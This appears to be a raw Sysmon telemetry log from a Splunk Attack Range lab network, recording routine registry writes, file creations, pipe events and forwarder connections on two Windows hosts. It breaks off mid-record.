08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fd-0x245210d5) 13241300x8000000000000000810056Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000810055Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6eb096) 13241300x8000000000000000810054Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ec-0x60c940d5) 13241300x8000000000000000810053Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f4-0xc28da8d5) 13241300x8000000000000000810052Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:06:04.536{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fd-0x245210d5) 23542300x8000000000000000810051Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:04.208{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0B143A5146969A4FE974AACF2CED9B9,SHA256=030F7706CA8815C7CA02198E61B54306D4C56DFF470286D61E3380B0DAEF743C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:05.343{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BF0687E451F9DA89AD8225AD9D90115,SHA256=9224871714F82AA5DC5A5F857BE6D29B842D0132C1EC0BEC6BA8201ADEB93AD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810063Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:05.224{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F44D1C4DE4644F1BACE536473680544,SHA256=CDD71FA8CA5A83122E00B3A861B78E01ECD2F8D69D2B78E902EE7524790F1341,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:57.590{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61943-false10.0.1.12-8000- 23542300x80000000000000001054190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:06.492{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:06.445{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001054188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:06.445{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001054187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:06:06.443{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7548.376.20418646C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001054186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:06:06.442{466BC892-57B0-60E8-6810-00000000CF01}7548\chrome.7548.376.20418646C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001054185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:06.377{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32C6BE076E27DCE20610EB2C0AA826E5,SHA256=1CE28DCBA5A4DEA4305284C9D61639760B42122F6F7A63E35CCCD2A6B1CBF111,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810064Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:06.286{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68981CC1A22FDC9B5283007D1760AF91,SHA256=7E7E691488DB65C86DFFD9EAF0B9BC1F9266124994159AA5E52F136079AC2604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.391{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=754D7FA1B8B4DCE1417DFD7972AEDCF6,SHA256=8E0B31490DF06D4112856556DBCF6085CE1D4F61D86B3056265ECE9F90B194A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810065Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:07.302{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0BC59E1E435E18AE230C1327E47E542,SHA256=2E5F5DFD61F977E9595BF26055809DAF0A7720E95946A3C0DD0D48748914FA14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.123{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5389932C6EE6313B1544F8E61B2FF4D2,SHA256=E904ABBDBAAC9ADEF817DAADC259BA8E08D8A9A779B6322D98DEF3DAD99211F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=97E8FA966113E3B3FDBF43A8521E8F44,SHA256=C87DF9F346186A5A84506D7C983A3BC9313E000C39F04AE49962853AFAEFA58D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2902FCC49299EDDB2B6FAA18D3995EF2,SHA256=9DC97ACB0AE1AF42784C1AE2F1A770BEAE8D6CB556400CCDE1090277C130FF07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7AD758C62FDCA6588C05F5595738FCDB,SHA256=2369D1F9F8F8CA820CBA828ECD67D04D0DCF63B44280735AB07E1630EAB2C4EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2E4FE80A940EFAC2BECBE7AF514861C8,SHA256=4F4F211338974EBDE9A35831A1F4AF427652B31789A680ADD086C365A69CE74C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F72B3F9BAB463E6568B0CCF89F2D6086,SHA256=00BC8ECD09FD68EAB8D8046ACCB45A7E9759F2BBCCE88937C32B5E42EAF59A9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8A70E33666E40458175601450CDF7415,SHA256=04DB1369E66C30336899E81C4DD0C743AF3ACC581B3F77AC562C8C452CDFB7AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DEDDD7FBD546DA45B61DE6BD6AB22426,SHA256=37A963CF53F06A322464922E9C9EBE4085799B704BD438B5586EC70698253753,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=91D58B67770C205A78398D9E081F3059,SHA256=E94C82DAF92B51FE3DB77E785C3A7FB5069CF580807E072CBCC60A70D971668E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=97FA1451EE3F72439BD80E77810CA460,SHA256=0DCF658CB38841AE6C229122A22E0A0673839821BA4FAFE16FFF8345ED8623E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:07.107{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E6B0180E0E2CD503E7FF545CED629077,SHA256=50DF1C8418A7BC97B1D8293D8066EA6FEFFB4A4D7F63D9EFFEFD9DBA3D139D39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:08.392{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF605DAAA35032E7BDE3CE76A7BF3173,SHA256=8C5DF48291271173A11B4A4E205C031E4D0684954C979F50DDE44FCF4BD2B900,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810066Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:08.333{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D4C235D52D6D3922545D2B8922C4E64,SHA256=5120B63A7CD7466FA2F51AAB8B0F50F753EB6D08C4318DDC47FD99CFB6A98604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810067Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:09.411{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E0959801F3D625A06785496F4BAE00A,SHA256=63597A92E14BF54BFC129930B3482E86C0B99D400D9898494D166EFC6D6FA359,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:09.840{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C5A49E61AA47F3F4B57A2F7EDF9491A,SHA256=AC24562F07CB8CCB2A2D47C0D6E1EDCE2246EA5A55E3FC28A639F6E92498EE27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:09.407{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2D8E877ACB984997ED0DEFD8A197C37,SHA256=28E0A8847FD87A691D26D18A9D95A68AB8E09D0DF96B9C04B3423D10967CE505,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810068Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:10.427{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84C26B612EE0E2CBD9DBCD31CD4E0122,SHA256=9ABD570BD5C404375901FDD5B6BE763D80C6CF06F499293F66C8546245471642,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:02.704{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61944-false10.0.1.12-8000- 23542300x80000000000000001054207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:10.439{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFE465220C83A6AEF33AEBE003F42512,SHA256=ADE94932E4B8897B40FA6583EBF128BE70222D247D452A789A2CFD04597C91D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810070Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:11.489{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7FFDDCE3D65AE64549B123062354AC0,SHA256=C5D5C45E6FD6990F048D19C66A4D17A914DF1F00A9C390447689F343DF56596A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:11.458{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CA1C3076DF46A5CCF296A214C9B1E2F,SHA256=0BE7AED0DADD0C9ED2B838A5A547D09FA4DA2AF354C1AD8E943F2EA66F664B49,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810069Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:09.342{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57442-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:12.473{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B3ED13AB95D05584D515D9941B0FCBB,SHA256=DC482E497A94781C3282F16ED534BAE26A847BD5F1BA6FA661FC62513A6169E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810071Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:12.505{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8D18A8CA2FBA95413D25B096536F492,SHA256=8881A546560FD456289DDF75BC9ED4007572B977A4D956214D32DFBF478768F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:13.474{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07AA4E3E2F592142F34A967E6596B0CD,SHA256=2BCF1307F130BEAAD5EF1CF99058B552E73A8E445C5E371C87073D1AD3BAE372,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810072Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:13.536{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DC1244F6B1DAF28B80BEA1DDE04A85D,SHA256=40144663D257BE17D70846A69B43E918363A9A2F1D297DC6F8747C0AE5ED8825,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810073Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:14.552{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B55C2C85A59A5D4F97F42F9F3494CB0,SHA256=240C87986B6BEAD5C36AD96DFC4A6296E94C3B890D2358BB69FA851F23EFC197,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:14.505{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36035A9FF5FF1EBDA68D9B546B16ECC4,SHA256=C0AF71CC8011D1841C7AB8F937537DB2A21467A4F6EB3A034AA349FEE73E2CC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810074Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:15.595{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18F605685C3819E4D48B08121C0F7F82,SHA256=C7807A47B01D9AEA87C472AA4B75C428E9B978BD376BA4041D336C222D057656,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:15.842{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:15.842{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:15.557{466BC892-02CE-60E8-7600-00000000CF01}3400NT 